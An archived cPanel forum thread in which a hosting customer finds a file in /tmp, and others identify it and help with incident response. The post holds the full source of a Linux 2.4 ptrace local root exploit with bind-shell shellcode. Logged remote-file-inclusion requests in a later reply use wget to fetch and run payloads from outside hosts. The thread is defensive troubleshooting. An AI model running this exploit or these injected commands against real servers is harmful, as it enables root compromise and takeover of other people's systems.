The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

hacked questions ( please help)

Discussion in 'General Discussion' started by shann, Jun 16, 2003.

  1. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    HI,

    I have found /tmp/mptrace.c . WE are running kernel redhat 8 and kernel 2.4.20.

    Did they attemp to hack ???

    any help is appreciated.

    cPanel.net Support Ticket Number:
     
  2. ciphervendor

    ciphervendor Well-Known Member

    Joined:
    Aug 26, 2002
    Messages:
    1,052
    Likes Received:
    0
    Trophy Points:
    36
    What are the contents of the file? The name of the file really means nothing.

    Also, 2.4.21 is out. It includes a patch for the ptrace vulnerability if your current kernel isn't patched.

    cPanel.net Support Ticket Number:
     
  3. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    This is the code/

    #include <stdio.h>
    #include <fcntl.h>
    #include <errno.h>
    #include <string.h>
    #include <stdlib.h>
    #include <signal.h>
    #include <sys/wait.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <sys/ptrace.h>
    #include <sys/socket.h>
    #include <linux/user.h> /* For user_regs_struct */

    #define SIZE (sizeof(shellcode)-1)

    pid_t parent=0;
    pid_t child=0;
    pid_t k_child=0;
    static int sigc=0;

    /*
    Port binding shellcode, courtesy of <anszom@v-lo.krakow.pl>
    I just changed the port no..... =p
    */

    char shellcode[]=
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x40"
    "\x50\x40\x50\x8d\x58\xff\x89\xe1\xb0\x66\xcd\x80\x83\xec\xf4\x89"
    "\xc7\x31\xc0\xb0\x04\x50\x89\xe0\x83\xc0\xf4\x50\x31\xc0\xb0\x02"
    "\x50\x48\x50\x57\x31\xdb\xb3\x0e\x89\xe1\xb0\x66\xcd\x80\x83\xec"
    "\xec\x31\xc0\x50\x66\xb8\x61\x2c\xc1\xe0\x10\xb0\x02\x50\x89\xe6"
    "\x31\xc0\xb0\x10\x50\x56\x57\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x83"
    "\xec\xec\x85\xc0\x75\x59\xb0\x01\x50\x57\x89\xe1\xb0\x66\xb3\x04"
    "\xcd\x80\x83\xec\xf8\x31\xc0\x50\x50\x57\x89\xe1\xb0\x66\xb3\x05"
    "\xcd\x80\x89\xc3\x83\xec\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74"
    "\x08\x31\xc0\xb0\x06\xcd\x80\xeb\xdc\x31\xc0\xb0\x3f\x31\xc9\xcd"
    "\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31"
    "\xc0\x50\xeb\x13\x89\xe1\x8d\x54\x24\x04\x5b\xb0\x0b\xcd\x80\x31"
    "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe8\xff\xff\xff/bin/sh";

    void sigchld() {
    sigc++;
    return;
    }

    void sigalrm() {
    fprintf(stderr,"-> Something wrong and it timeout.\n");
    exit(0);
    }

    main(int argc, char *argv[]) {

    int i, error;
    pid_t pid;

    struct user_regs_struct regs; /* Registers Structure */

    parent=getpid();

    switch (pid=fork()) {

    case -1:
    perror("Can't fork(): ");
    break;

    case 0: /* Child's thread -- The attacking thread. */

    child=getpid();
    k_child=child+1; /* Kernel child's PID... Hopefully.. */

    fprintf(stderr, "-> Parent's PID is %d. Child's PID is %d.\n", p
    arent, child);

    fprintf(stderr, "-> Attaching to %d...", k_child);

    /*
    Trying to attach to the child spawned by the kernel, which ha
    s both
    euid and egid set to 0. Child will be sent a SIGSTOP and we,
    the 'parent',
    will get a SIGCHLD. This process is not immediate. Hence, we
    need to
    wait before we continue. Otherwise, we will fail controlling
    the thread.
    */

    signal(SIGCHLD,sigchld);
    signal(SIGALRM,sigalrm);
    alarm(10);

    while ((error=ptrace(PTRACE_ATTACH,k_child,0,0)==-1) && (errno==
    ESRCH)) {
    fprintf(stderr, ".");
    }

    if (error==-1) {
    fprintf(stderr,"-> Unable to attach to %d.\n",k_child);
    exit(0);
    }

    fprintf(stderr, "\n-> Got the thread!!\n");

    /*
    Waiting for the firt SIGCHLD, which signals the end of the at
    taching action.
    */

    while(sigc<1);

    if (ptrace(PTRACE_SYSCALL,k_child,0,0)==-1) {
    fprintf(stderr,"-> Unable to setup syscall trace.\n");
    exit(0);
    }

    /*
    The thread is under our control now. Will wail for the next s
    ignal
    to inject our own code.
    */

    fprintf(stderr,"-> Waiting for the next signal...\n");
    while(sigc<2);

    if (ptrace(PTRACE_GETREGS,k_child,NULL,&regs)==-1) {
    perror("-> Unable to read registers: ");
    }

    fprintf(stderr, "-> Injecting shellcode at 0x%08x\n",regs.eip);

    for (i=0; i<=SIZE; i+=4) {
    if( ptrace(PTRACE_POKETEXT,k_child,regs.eip+i,*(int*)(sh
    ellcode+i))) {}
    }

    fprintf(stderr, "-> Bind root shell on port 24876... =p\n");

    /*
    All done. It's time to leave 'our' poor child alone.... ;)
    and get ready to kill ourselves...
    */

    if (ptrace(PTRACE_DETACH,k_child,0,0)==-1) {
    perror("-> Unable to detach from modprobe thread: ");
    }

    fprintf(stderr, "-> Detached from modprobe thread.\n");
    fprintf(stderr, "-> Committing suicide.....\n");

    if (kill(parent,9)==-1) { /* This is really ugly..... */
    perror("-> We survived??!!?? ");
    }

    /*
    We should be dead by now.
    */

    exit(0);

    break;

    default: /* Parent's thread -- The vulnerable call */

    /*
    Now, the parent is requesting a feature in a kernel module.
    Such action will trigger the kernel to spawn a child with
    euid=0, egid=0.... Voila!!!

    NB: See <linux/socket.h> for more info.
    */
    signal(SIGALRM,sigalrm);
    alarm(10);
    socket(AF_SECURITY,SOCK_STREAM,1);
    break;
    }
    exit(0);

    }

    cPanel.net Support Ticket Number:
     
  4. ciphervendor

    ciphervendor Well-Known Member

    Joined:
    Aug 26, 2002
    Messages:
    1,052
    Likes Received:
    0
    Trophy Points:
    36
    That's the ptrace exploit code. If that was executed on your machine and you don't have a patched kernel; you're up sh*ts creek without a paddle so to speak.

    cPanel.net Support Ticket Number:
     
  5. jmc67

    jmc67 Well-Known Member

    Joined:
    Mar 10, 2002
    Messages:
    105
    Likes Received:
    0
    Trophy Points:
    16
    Are there any issues with cpanel and this version of the kernel?

    cPanel.net Support Ticket Number:
     
  6. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    How could I find out, this is has been executed?. Any hel p would be appreciated.

    thanks

    cPanel.net Support Ticket Number:
     
  7. Admin356

    Admin356 Active Member

    Joined:
    Feb 19, 2003
    Messages:
    25
    Likes Received:
    0
    Trophy Points:
    1
    Do a grep on your users domlogs to see where it came in from, if it was owned by nobody, it will have been downloaded via an insecure php application.

    Quick shell script to see where it came in from:

    #!/bin/sh
    for site in `ls /usr/local/apache/domlogs`
    do
    grep "wget" /usr/local/apache/domlogs/$site >> site-log
    echo "$site" >> site-log
    echo "$site checked"
    done
    exit 0


    execute that script, then read the site-log after, it will tell you what downloaded it from where. You need to block the IP of the machine being used for the download, usually a free host in Brazil - It would probably have been executed - You will see that in the URL that you find in your domlogs - Usual place is from a clients shoutbox app.

    If you don't have a patched kernel, you maybe hacked already.Do a nmap look for open ports that shouldn't be.

    Also

    ps auxf - and look for processes running under the user "nobody" either modprobe something or the name of the file you removed ie ./kde for example.

    Hope that helps.

    cPanel.net Support Ticket Number:
     
  8. [iG]

    [iG] Member

    Joined:
    Oct 16, 2002
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    Thanks for the script, you saved me oh so much time.

    cp7# cat site-log | grep wget
    grep "wget" /home2/usr/local/apache/domlogs/$site >> site-log
    200.182.136.2 - - [14/Feb/2004:11:52:31 -0500] "GET /index2.php?page=http://portal1.homeigo.com/accounts/index_1.txt&cmd=wget HTTP/1.0" 200 15707 "-" "Opera/7.23 (Windows NT 5.1; U) [en]"
    200.182.136.2 - - [14/Feb/2004:11:52:49 -0500] "GET /index2.php?page=http://portal1.homeigo.com/accounts/index_1.txt&cmd=wget%20-O%20/tmp/bbd%20http://portal1.homeigo.com/accounts/bbd HTTP/1.0" 200 15619 "-" "Opera/7.23 (Windows NT 5.1; U) [en]"
    200.103.84.104 - - [14/Feb/2004:18:02:32 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=wget%20www.downloadsmil.hpg.com.br/cgi HTTP/1.1" 200 17398 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.103.84.104 - - [14/Feb/2004:18:03:14 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=cd%20tmp;wget%20www.downloadsmil.hpg.com.br/cgi HTTP/1.1" 200 17398 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.217.33.8 - - [14/Feb/2004:18:17:48 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=wget%20www.criminalsproject.hpg.com.br/bd HTTP/1.1" 200 17419 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
    200.217.33.8 - - [14/Feb/2004:18:18:33 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=wget%20www.criminalsproject.hpg.com.br/bd HTTP/1.1" 200 17419 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
    200.199.129.122 - - [14/Feb/2004:18:19:24 -0500] "GET /index2.php?page=http://www.freewebs.com/sexysuperstar13/five.php?&cmd=cd%20/tmp;wget%20http://planeta.terra.com.br/informatica/defacer/cgi;chmod%20777%20cgi;./cgi HTTP/1.1" 200 16790 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


    Funny, all brazillian IPs. now the script is removed, i feel secure :D
     
  9. StevenC

    StevenC Well-Known Member

    Joined:
    Jan 1, 2004
    Messages:
    254
    Likes Received:
    0
    Trophy Points:
    16
    netstat -lntpe

    is useful at times to match ports to executables
     
Loading...

Share This Page